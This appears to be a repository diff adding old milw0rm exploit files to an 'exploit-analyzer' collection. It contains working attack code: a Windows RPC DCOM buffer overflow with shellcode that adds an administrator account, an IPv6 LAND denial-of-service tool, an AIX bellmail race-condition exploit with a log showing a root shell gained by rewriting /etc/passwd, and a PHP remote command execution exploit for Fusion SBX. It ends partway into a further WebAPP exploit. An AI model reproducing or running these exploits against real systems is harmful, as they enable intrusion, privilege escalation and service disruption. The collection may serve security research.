+"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
+"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
+"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
+"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
+"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
+"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
+"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
+"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
+"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
+"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
+"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
+"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
+#define	sc_offset		0x24
+#define	sc_max			0x208
+#define	jmp_addr_offset	sc_max+sc_offset+0x8
+#define	top_seh_offset	jmp_addr_offset+0x4
+unsigned char sc[]=
+"\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
+"\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
+"\x43\x00\x24\x00\x5c\x00"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
+"\xe9\xf3\xfd\xff\xff"
+"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";
+unsigned char request4[]={
+0x01,0x10
+,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
+,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
+,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+};
+struct
+{
+	char	*os;
+	DWORD	dwTopSeh;
+	char	*seh;
+	DWORD	dwJmpAddr;
+	char	*jmp;
+}
+targets[] =
+{
+	{ "2kEnSp4+MS03-026",
+		0x7c54144c,
+		"kernel32.dll v5.0.2195.6688",
+		0x77a1b496,
+		"OLEAUT32.dll v2.40.4522.0"},
+	{ "2kEnSp3+SomeHotFixs+MS03-026",
+		0x77eda1f0,
+		"kernel32.dll v5.0.2195.6079",
+		0x77a1afa9,
+		"OLEAUT32.dll v2.40.4518.0"}
+}, v;
+void main(int argc,char ** argv)
+{
+    WSADATA WSAData;
+    SOCKET sock;
+    int len,len1;
+    SOCKADDR_IN addr_in;
+    short port=135;
+    unsigned char buf1[0x1000];
+    unsigned char buf2[0x1000];
+	int	i, iType;
+	printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
+			"Base on flashsky's MS03-026 exp\n"
+			"Code by ey4s<eyas#xfocus.org>\n"
+			"2003-09-16\n"
+			"Welcome to http://www.xfocus.net\n"
+			"Thanks to flashsky & benjurry & Dave Aitel\n"
+			"If success, target will add a user \"e\" and password is \"asd#321\"\n\n");
+	if(argc!=3)
+	{
+		printf("Usage: %s <target> <type>\n", argv[0]);
+		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+			printf( "<%d>   %s\n"
+					"      TopSeh=0x%.8x in %s\n"
+					"      JmpAddr=0x%.8x in %s\n",
+					i, targets[i].os,
+					targets[i].dwTopSeh, targets[i].seh,
+					targets[i].dwJmpAddr, targets[i].jmp);
+		return;
+	}
+	iType = atoi(argv[2]);
+	if((iType<0) || iType > sizeof(targets)/sizeof(v))
+	{
+		printf("[-] Wrong type.\n");
+		return;
+	}
+	memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
+	memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
+	memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
+	printf("[+] Prepare shellcode completed.\n");
+    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
+    {
+        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
+        return;
+    }
+    addr_in.sin_family=AF_INET;
+    addr_in.sin_port=htons(port);
+    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
+    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
+    {
+        printf("Socket failed.Error:%d\n",WSAGetLastError());
+        return;
+    }
+    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
+    {
+        printf("Connect failed.Error:%d",WSAGetLastError());
+        return;
+    }
+	printf("[+] Connect to %s:135 success.\n", argv[1]);
+	if(sizeof(sc_add_user) > sc_max)
+	{
+		printf("[-] shellcode too long, exit.\n");
+		return;
+	}
+    len=sizeof(sc);
+    memcpy(buf2,request1,sizeof(request1));
+    len1=sizeof(request1);
+    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //¼ÆËãÎÄ¼þÃûË«×Ö½Ú³¤¶È
+    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//¼ÆËãÎÄ¼þÃûË«×Ö½Ú³¤¶È
+    memcpy(buf2+len1,request2,sizeof(request2));
+    len1=len1+sizeof(request2);
+    memcpy(buf2+len1,sc,sizeof(sc));
+    len1=len1+sizeof(sc);
+    memcpy(buf2+len1,request3,sizeof(request3));
+    len1=len1+sizeof(request3);
+    memcpy(buf2+len1,request4,sizeof(request4));
+    len1=len1+sizeof(request4);
+    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
+    //¼ÆËã¸÷ÖÖ½á¹¹µÄ³¤¶È
+    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
+    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
+    len = send(sock,bindstr,sizeof(bindstr),0);
+	if(len<=0)
+    {
+            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
+            return;
+    }
+ 	else
+		printf("[+] send %d bytes.\n", len);
+    len=recv(sock,buf1,1000,0);
+	if(len<=0)
+	{
+		printf("[-] recv error:%d\n", GetLastError());
+		return;
+	}
+	else
+		printf("[+] recv %d bytes.\n", len);
+    len = send(sock,buf2,len1,0);
+	if(len<=0)
+    {
+            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
+            return;
+    }
+	else
+		printf("[+] send %d bytes.\n", len);
+    len=recv(sock,buf1,1024,0);
+	if(len<=0)
+	{
+		printf("[+] Target crash or exploit success? :)\n");
+	}
+	else
+		printf("[-] recv %d bytes. Bad luck!\n", len);
+}
+// milw0rm.com [2003-09-16]

exploit-analyzer/exploits/exploit_1000.txt ADDED Viewed

	@@ -0,0 +1,243 @@

+//
+// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D}
+//fe80::2a1:b0ff:fe08:8bcc 135
+//
+// Written by: Konrad Malewski.
+//
+#include <stdlib.h>
+#include <stdio.h>
+#include <Winsock2.h>
+#include <ws2tcpip.h>
+#include <pcap.h>
+#include <remote-ext.h>
+///////////////////////////////////////////////////////////////////////////////
+///////////// from libnet /////////////
+/* ethernet addresses are 6 octets long */
+#define ETHER_ADDR_LEN 0x6
+typedef unsigned char u_int8_t;
+typedef unsigned short u_int16_t;
+typedef unsigned int u_int32_t;
+typedef unsigned __int64 u_int64_t;
+/*
+* Ethernet II header
+* Static header size: 14 bytes
+*/
+struct libnet_ethernet_hdr
+{
+u_int8_t ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
+u_int8_t ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
+u_int16_t ether_type; /* protocol */
+};
+struct libnet_in6_addr
+{
+union
+{
+u_int8_t __u6_addr8[16];
+u_int16_t __u6_addr16[8];
+u_int32_t __u6_addr32[4];
+} __u6_addr; /* 128-bit IP6 address */
+};
+/*
+* IPv6 header
+* Internet Protocol, version 6
+* Static header size: 40 bytes
+*/
+struct libnet_ipv6_hdr
+{
+u_int8_t ip_flags[4]; /* version, traffic class, flow label */
+u_int16_t ip_len; /* total length */
+u_int8_t ip_nh; /* next header */
+u_int8_t ip_hl; /* hop limit */
+struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */
+};
+/*
+* TCP header
+* Transmission Control Protocol
+* Static header size: 20 bytes
+*/
+struct libnet_tcp_hdr
+{
+u_int16_t th_sport; /* source port */
+u_int16_t th_dport; /* destination port */
+u_int32_t th_seq; /* sequence number */
+u_int32_t th_ack; /* acknowledgement number */
+u_int8_t th_x2:4, /* (unused) */
+th_off:4; /* data offset */
+u_int8_t th_flags; /* control flags */
+u_int16_t th_win; /* window */
+u_int16_t th_sum; /* checksum */
+u_int16_t th_urp; /* urgent pointer */
+};
+int libnet_in_cksum(u_int16_t *addr, int len)
+{
+int sum;
+union
+{
+u_int16_t s;
+u_int8_t b[2];
+}pad;
+sum = 0;
+while (len > 1)
+{
+sum += *addr++;
+len -= 2;
+}
+if (len == 1)
+{
+pad.b[0] = *(u_int8_t *)addr;
+pad.b[1] = 0;
+sum += pad.s;
+}
+return (sum);
+}
+#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16))
+& 0xffff))
+///////////////////////////////////////////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+u_char packet[74];
+struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
+struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
+struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;
+u_char errbuf[1024];
+pcap_t *pcap_handle;
+void usage(char* n)
+{
+pcap_if_t * alldevs,*d;
+int i=1;
+fprintf(stdout,"Usage:\n"
+"\t %s <device> <victim> <port>\n",n);
+if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
+{
+fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
+exit(EXIT_FAILURE);
+}
+printf("Avaliable adapters: \n");
+d = alldevs;
+while (d!=NULL)
+{
+printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
+d = d->next;
+}
+pcap_freealldevs (alldevs);
+}
+///////////////////////////////////////////////////////////////////////////////
+int main(int argc, char* argv[])
+{
+if ( argc<4 )
+{
+usage(argv[0]);
+return EXIT_FAILURE;
+}
+int retVal;
+struct addrinfo hints,*addrinfo;
+ZeroMemory(&hints,sizeof(hints));
+WSADATA wsaData;
+if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
+{
+fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
+return EXIT_FAILURE;
+}
+//
+// Get MAC address of remote host (assume link local IpV6 address)
+//
+hints.ai_family = PF_INET6;
+hints.ai_socktype = SOCK_STREAM;
+hints.ai_protocol = IPPROTO_TCP;
+hints.ai_flags = AI_PASSIVE;
+retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
+if ( retVal!=0 )
+{
+WSACleanup();
+fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
+exit(EXIT_FAILURE);
+}
+//
+// Open WinPCap adapter
+//
+if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS,
+100, (char*)errbuf)) == NULL )
+{
+freeaddrinfo(addrinfo);
+WSACleanup();
+fprintf(stderr, "Error opening device: %s\n",argv[1]);
+return EXIT_FAILURE;
+}
+ZeroMemory(packet,sizeof(packet));
+struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
+// fill ethernet header
+eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like
+00:something;
+eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
+eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
+eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
+eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
+eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
+eth_hdr->ether_type = 0xdd86;
+// fill IP header
+// source ip == destination ip
+memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
+memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
+ip6_hdr->ip_hl = 255;
+ip6_hdr->ip_nh = IPPROTO_TCP;
+ip6_hdr->ip_len = htons (20);
+ip6_hdr->ip_flags[0] = 0x06 << 4;
+srand((unsigned int) time(0));
+// fill tcp header
+tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source
+port equal to destination
+tcp_hdr->th_seq = rand();
+tcp_hdr->th_ack = rand();
+tcp_hdr->th_off = htons(5);
+tcp_hdr->th_win = rand();
+tcp_hdr->th_sum = 0;
+tcp_hdr->th_urp = htons(10);
+tcp_hdr->th_off = 5;
+tcp_hdr->th_flags = 2;
+// calculate tcp checksum
+int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
+chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
+chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct
+libnet_tcp_hdr));
+tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
+// send data to wire
+retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
+if ( retVal == -1 )
+{
+fprintf(stderr,"Error writing packet to wire!!\n");
+}
+//
+// close adapter, free mem.. etc..
+//
+pcap_close(pcap_handle);
+freeaddrinfo(addrinfo);
+WSACleanup();
+return EXIT_SUCCESS;
+}
+// milw0rm.com [2005-05-17]

exploit-analyzer/exploits/exploit_1001.txt ADDED Viewed

	@@ -0,0 +1,289 @@

+-bash-2.05b$
+-bash-2.05b$ cat x_aix5_bellmail.pl
+#!/usr/bin/perl
+# FileName: x_aix5_bellmail.pl
+# Exploit "Race condition vulnerability (BUGTRAQ  ID: 8805)" of /usr/bin/bellmail
+#         command on Aix5 to change any file owner to current user.
+#
+#Usage    : x_aix5_bellmail.pl aim_file
+#           aim_file : then file wich you want to chown to you.
+#    Note : Maybe you should run more than one to "Race condition".
+#           The file named "x_bell.sh" can help you to use this exp.
+#           You should type "w" "Enter" then "q"  "Enter" key on keyboard
+#          as fast as you can when bellmail prompt "?" appear.
+#
+# Author  : watercloud@xfocus.org
+#     XFOCUS Team
+#     http://www.xfocus.net   (CN)
+#     http://www.xfocus.org   (EN)
+#
+# Date    : 2004-6-6
+# Tested  : on  Aix5.1.
+# Addition: IBM had offered a patch named "IY25661" for it.
+# Announce: use as your owner risk!
+$CMD="/usr/bin/bellmail";
+$MBOX="$ENV{HOME}/mbox";
+$TMPFILE="/tmp/.xbellm.tmp";
+$AIM_FILE = shift @ARGV ;
+$FORK_NUM = 1000;
+die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;
+unlink $MBOX;
+system "echo abc > $TMPFILE";
+system "$CMD $ENV{LOGIN} < $TMPFILE";
+unlink $TMPFILE;
+$ret=`ls -l $AIM_FILE"`;
+print "Before: $ret";
+if( fork()==0 )
+{
+        &deamon($FORK_NUM);
+        exit 0 ;
+}
+sleep( (rand()*100)%4);
+exec $CMD;
+$ret=`ls -l $AIM_FILE"`;
+print "Now: $ret";
+sub deamon {
+        $num = shift || 1;
+        for($i=0;$i<$num;$i++) {
+                &do_real() if fork()==0;
+        }
+}
+sub do_real {
+        if(-e $MBOX) {
+                unlink $MBOX ;
+                symlink "$AIM_FILE",$MBOX;
+        }
+        exit 0;
+}
+#EOF
+-bash-2.05b$
+-bash-2.05b$ cat x_bellmail.sh
+#!/bin/sh
+#File:x_bellmail.sh
+#The assistant of x_aix5_bellmail.pl
+#Author : watercloud@xfocus.org
+#Date   :2004-6-6
+#
+X_BELL_PL="./x_aix5_bellmail.pl"
+AIM=$1
+if [ $# ne 1 ] ;then
+        echo "Need a aim file name as argv."
+        exit 1;
+fi
+if [ ! -e "$1" ];then
+        echo "$1 not exist!"
+        exit 1
+fi
+if [ ! -x "$X_BELL_PL" ];then
+        echo "can not exec $X_BELL_PL"
+        exit 1
+fi
+ret=`ls -l $AIM`
+echo $ret; echo
+fuser=`echo $ret |awk '{print $3}'`
+while [ "$fuser" != "$LOGIN" ]
+do
+        $X_BELL_PL $AIM
+        ret=`ls -l $AIM`
+        echo $ret;echo
+        fuser=`echo $ret |awk '{print $3}'`
+done
+echo $ret; echo
+#EOF
+-bash-2.05b$ id
+uid=201(cloud) gid=1(staff)
+-bash-2.05b$
+-bash-2.05b$ oslevel
+5.1.0.0
+-bash-2.05b$ oslevel -r
+5100-01
+-bash-2.05b$ ls -l /usr/bin/bellmail
+-r-sr-sr-x   1 root     mail          30208 Aug 09 2003  /usr/bin/bellmail
+-bash-2.05b$ ls -l /etc/passwd
+-rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+-bash-2.05b$ cp /etc/passwd /tmp/
+-bash-2.05b$ ./x_bellmail.sh /etc/passwd
+./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:49:30 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:49:35 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:49:40 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:49:43 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+w
+From cloud Sun Jun  6 08:49:48 2004
+abc
+? From cloud Sun Jun  6 08:25:20 2004
+abc
+? w
+bellmail: cannot append to /home/cloud/mbox
+? w
+bellmail: cannot append to /home/cloud/mbox
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:49:56 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd
+Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
+From cloud Sun Jun  6 08:50:01 2004
+abc
+? w
+From cloud Sun Jun  6 08:25:20 2004
+abc
+? q
+-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
+-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd
+-bash-2.05b$ cat /etc/passwd
+root:!:0:0::/:/usr/bin/ksh
+daemon:!:1:1::/etc:
+bin:!:2:2::/bin:
+sys:!:3:3::/usr/sys:
+adm:!:4:4::/var/adm:
+uucp:!:5:5::/usr/lib/uucp:
+guest:!:100:100::/home/guest:
+nobody:!:4294967294:4294967294::/:
+lpd:!:9:4294967294::/:
+lp:*:11:11::/var/spool/lp:/bin/false
+invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
+nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
+snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
+imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
+cloud:!:201:1::/home/cloud:/usr/local/bin/bash
+-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd
+-bash-2.05b$ su cloud
+cloud's Password:
+3004-502 Cannot get "LOGNAME" variable.
+-bash-2.05b$ id
+uid=201 gid=1(staff)
+-bash-2.05b$ ls -l /etc/passwd
+-rw-r--r--   1 201      staff           568 Jun 06 08:56 /etc/passwd
+-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash'  >> /etc/passwd
+-bash-2.05b$ cat /etc/passwd
+root:!:0:0::/:/usr/bin/ksh
+daemon:!:1:1::/etc:
+bin:!:2:2::/bin:
+sys:!:3:3::/usr/sys:
+adm:!:4:4::/var/adm:
+uucp:!:5:5::/usr/lib/uucp:
+guest:!:100:100::/home/guest:
+nobody:!:4294967294:4294967294::/:
+lpd:!:9:4294967294::/:
+lp:*:11:11::/var/spool/lp:/bin/false
+invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
+nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
+snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
+imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
+cloud:!:0:1::/home/cloud:/usr/local/bin/bash
+test:!:201:1::/home/cloud:/usr/local/bin/bash
+-bash-2.05b$ su cloud
+cloud's Password:
+bash-2.05b# id
+uid=0(root) gid=1(staff)
+bash-2.05b# ls -l /etc/passwd
+-rw-r--r--   1 test     staff           614 Jun 06 08:58 /etc/passwd
+bash-2.05b# cp /tmp/passwd /etc/passwd
+bash-2.05b# chown root /tmp/passwd
+bash-2.05b# ls -l /tmp/passwd
+-rw-r--r--   1 root     staff           570 Jun 06 08:48 /tmp/passwd
+bash-2.05b# id
+uid=0(root) gid=1(staff)
+bash-2.05b#
+bash-2.05b# rm /tmp/.bel*
+bash-2.05b# rm /tmp/passwd
+bash-2.05b#
+# milw0rm.com [2005-05-19]

exploit-analyzer/exploits/exploit_1003.txt ADDED Viewed

	@@ -0,0 +1,195 @@

+/*****************************************************
+*                                                    *
+*  [Fusion SBX <= 1.2] exploit                       *
+*                                                    *
+*  sileFSBXxpl                                       *
+*                                                    *
+*  This exploit use vulnerability found into         *
+*  Fusion SBX and create new variable and call it    *
+*  with a malicious function (stored in config.php). *
+*  This exploit utilize injection of three diverse   *
+*  procedures for execution of arbitrary code on     *
+*  vulnerable machine with httpd privileges.         *
+*                                                    *
+*  References: www.securityfocus.org/bid/13575       *
+*                                                    *
+*  coded by: Silentium of Anacron Group Italy        *
+*      date: 10/05/2005                              *
+*    e-mail: anacrongroupitaly[at]autistici[dot]org  *
+*   my_home: www.autistici.org/anacron-group-italy   *
+*                                                    *
+*  this tool is developed under GPL license          *
+*  no(c) .:. copyleft                                *
+*                                                    *
+*****************************************************/
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#define PORT 80		// port of web server
+void info(void);
+void banner(void);
+void sendxpl(FILE *out, char *argv[], int type);
+void errsock(void);
+void errgeth(void);
+void errconn(char *argv[]);
+int main(int argc, char *argv[]){
+FILE *out;
+int sock, sockconn, type;
+struct sockaddr_in addr;
+struct hostent *hp;
+if(argc!=4)
+   info();
+type = atoi(argv[3]);
+if(type < 1 || type > 3)
+   info();
+banner();
+if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
+   errsock();
+   printf("[*] Creating socket		[OK]\n");
+if((hp = gethostbyname(argv[1])) == NULL)
+   errgeth();
+   printf("[*] Resolving victim host	[OK]\n");
+memset(&addr,0,sizeof(addr));
+memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
+addr.sin_family = AF_INET;
+addr.sin_port = htons(PORT);
+sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
+if(sockconn < 0)
+   errconn(argv);
+   printf("[*] Connecting at victim host   [OK]\n");
+out = fdopen(sock,"a");
+setbuf(out,NULL);
+sendxpl(out,argv,type);
+   printf("[*] Now test at execute code on\n\n"
+          "[1] %s%sindex.php?sile=id\n"
+          "[2] %s%sadmin/index.php?sile=id\n\n",argv[1],argv[2],argv[1],argv[2]);
+shutdown(sock,2);
+close(sock);
+return 0;
+}
+void info(void){
+system("clear");
+printf("\n   #########################################\n"
+       "   #             sileFSBXxpl               #\n"
+       "   #  ###################################  #\n"
+       "   #       Fusion SBX <= 1.2 exploit       #\n"
+       "   #       Remote Command Execution        #\n"
+       "   #          coded by Silentium           #\n"
+       "   #        [ Anacron Group Italy ]        #\n"
+       "   #  ###################################  #\n"
+       "   # www.autistici.org/anacron-group-italy #\n"
+       "   #########################################\n\n"
+       " [Usage]\n\n"
+       "  sileFSBXxpl <victim> <path_sbx> <type>\n\n"
+       "        [Type]\n\n"
+       "              1) injection of system()\n"
+       "              2) injection of exec()\n"
+       "              3) injection of passthru()\n\n"
+       " [Example]\n\n"
+       "  sileFSBXxpl www.victim.com /sbx/ 1\n\n");
+exit(1);
+}
+void banner(void){
+system("clear");
+printf("[-] sileFSBXxpl\n"
+       "    ============\n"
+       "[-] Fusion SBX <= 1.2 exploit\n"
+       "[-] coded by Silentium - Anacron Group Italy\n"
+       "[-] www.autistici.org/anacron-group-italy\n\n");
+}
+void sendxpl(FILE *out, char *argv[], int type){
+char *call;
+int size = 245;
+if(type == 1)
+   call = "system";
+else if(type == 2)
+   call = "exec";
+else if(type == 3)
+   call = "passthru";
+size+=strlen(call);
+fprintf(out,"POST %sadmin/?settings HTTP/1.0\n"
+            "Connection: Keep-Alive\n"
+            "Pragma: no-cache\n"
+            "Cache-control: no-cache\n"
+            "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
+            "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
+            "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
+            "Accept-Language: en\n"
+            "Host: %s\n"
+            "Content-Type: application/x-www-form-urlencoded\n"
+            "Content-Length: %d\n\n"
+            "set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
+            "refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
+            "2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
+            "&setsubmit=Commit+Changes&is_logged=1\n\n",argv[2],argv[1],size,call);
+            printf("[*] Sending exploit		[OK]\n\n");
+}
+void errsock(void){
+system("clear");
+printf("[x] Creating socket	[FAILED]\n\n");
+exit(1);
+}
+void errgeth(void){
+printf("[x] Resolving victim host	[FAILED]\n\n");
+exit(1);
+}
+void errconn(char *argv[]){
+printf("[x] Connecting at victim host	[FAILED]\n\n",argv[1]);
+exit(1);
+}
+// milw0rm.com [2005-05-20]

exploit-analyzer/exploits/exploit_1004.txt ADDED Viewed

	@@ -0,0 +1,100 @@

+<?php
+########################################################
+#                                                      #
+#  WebAPP v0.9.9.2.1 Remote Command Execution Exploit  #
+#                 [Code by Nikyt0x]                    #
+#                 nikyt0x@gmail.com                    #
+#                                                      #
